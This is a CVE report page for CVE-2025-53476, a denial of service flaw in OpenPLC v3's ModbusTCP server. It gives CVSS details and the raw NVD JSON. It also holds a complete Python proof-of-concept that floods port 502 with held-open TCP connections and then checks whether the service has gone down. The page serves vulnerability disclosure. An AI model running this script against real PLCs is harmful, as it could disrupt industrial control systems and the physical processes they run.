Security Vulnerability Report
中文
CVE-2025-53476 CVSS 5.3 MEDIUM

CVE-2025-53476

Published: 2025-10-07 14:15:37
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

A denial of service vulnerability exists in the ModbusTCP server functionality of OpenPLC _v3 a931181e8b81e36fadf7b74d5cba99b73c3f6d58. A specially crafted series of network connections can lead to the server not processing subsequent Modbus requests. An attacker can open a series of TCP connections to trigger this vulnerability.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

OpenPLC v3(commit a931181e8b81e36fadf7b74d5cba99b73c3f6d58及之前版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-53476 - OpenPLC v3 ModbusTCP Server Denial of Service PoC # This PoC demonstrates a DoS attack against OpenPLC v3's ModbusTCP server # by opening a series of TCP connections to exhaust server resources. import socket import threading import sys import time import argparse TARGET_HOST = "127.0.0.1" TARGET_PORT = 502 # Default ModbusTCP port NUM_CONNECTIONS = 200 # Number of concurrent connections to establish CONNECTION_TIMEOUT = 5 def open_connection(host, port, conn_id): """Open a TCP connection and hold it open to exhaust server resources.""" try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(CONNECTION_TIMEOUT) sock.connect((host, port)) print(f"[+] Connection {conn_id} established to {host}:{port}") # Hold the connection open without sending any data # This will consume server-side resources (file descriptors, threads, etc.) time.sleep(300) sock.close() except socket.error as e: print(f"[-] Connection {conn_id} failed: {e}") def verify_service_available(host, port): """Verify if the ModbusTCP service is still responsive.""" try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(3) sock.connect((host, port)) sock.close() return True except socket.error: return False def main(): parser = argparse.ArgumentParser(description="CVE-2025-53476 PoC - OpenPLC v3 ModbusTCP DoS") parser.add_argument("-t", "--target", default=TARGET_HOST, help="Target host IP address") parser.add_argument("-p", "--port", type=int, default=TARGET_PORT, help="Target ModbusTCP port") parser.add_argument("-c", "--connections", type=int, default=NUM_CONNECTIONS, help="Number of connections") args = parser.parse_args() print(f"[*] CVE-2025-53476 PoC - OpenPLC v3 ModbusTCP DoS") print(f"[*] Target: {args.target}:{args.port}") print(f"[*] Connections to open: {args.connections}") # Check if service is available before attack print("\n[*] Checking service availability before attack...") if verify_service_available(args.target, args.port): print("[+] Service is responsive before attack.") else: print("[-] Service is not responding. Aborting.") sys.exit(1) # Launch concurrent connections print(f"\n[*] Launching {args.connections} concurrent TCP connections...") threads = [] for i in range(args.connections): t = threading.Thread(target=open_connection, args=(args.target, args.port, i + 1)) t.daemon = True t.start() threads.append(t) time.sleep(0.05) # Small delay between connection attempts # Wait for connections to be established time.sleep(10) # Check if service is still available after attack print("\n[*] Checking service availability after attack...") if verify_service_available(args.target, args.port): print("[+] Service is still responsive. DoS may not have been triggered.") print("[*] Try increasing the number of connections.") else: print("[!] Service is no longer responding! DoS triggered successfully.") print("[!] CVE-2025-53476 has been exploited.") print("\n[*] Press Ctrl+C to exit and close all connections.") try: while True: time.sleep(1) except KeyboardInterrupt: print("\n[*] Closing connections and exiting.") sys.exit(0) if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53476", "sourceIdentifier": "[email protected]", "published": "2025-10-07T14:15:37.270", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A denial of service vulnerability exists in the ModbusTCP server functionality of OpenPLC _v3 a931181e8b81e36fadf7b74d5cba99b73c3f6d58. A specially crafted series of network connections can lead to the server not processing subsequent Modbus requests. An attacker can open a series of TCP connections to trigger this vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-775"}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2223", "source": "[email protected]"}, {"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2025-2223", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.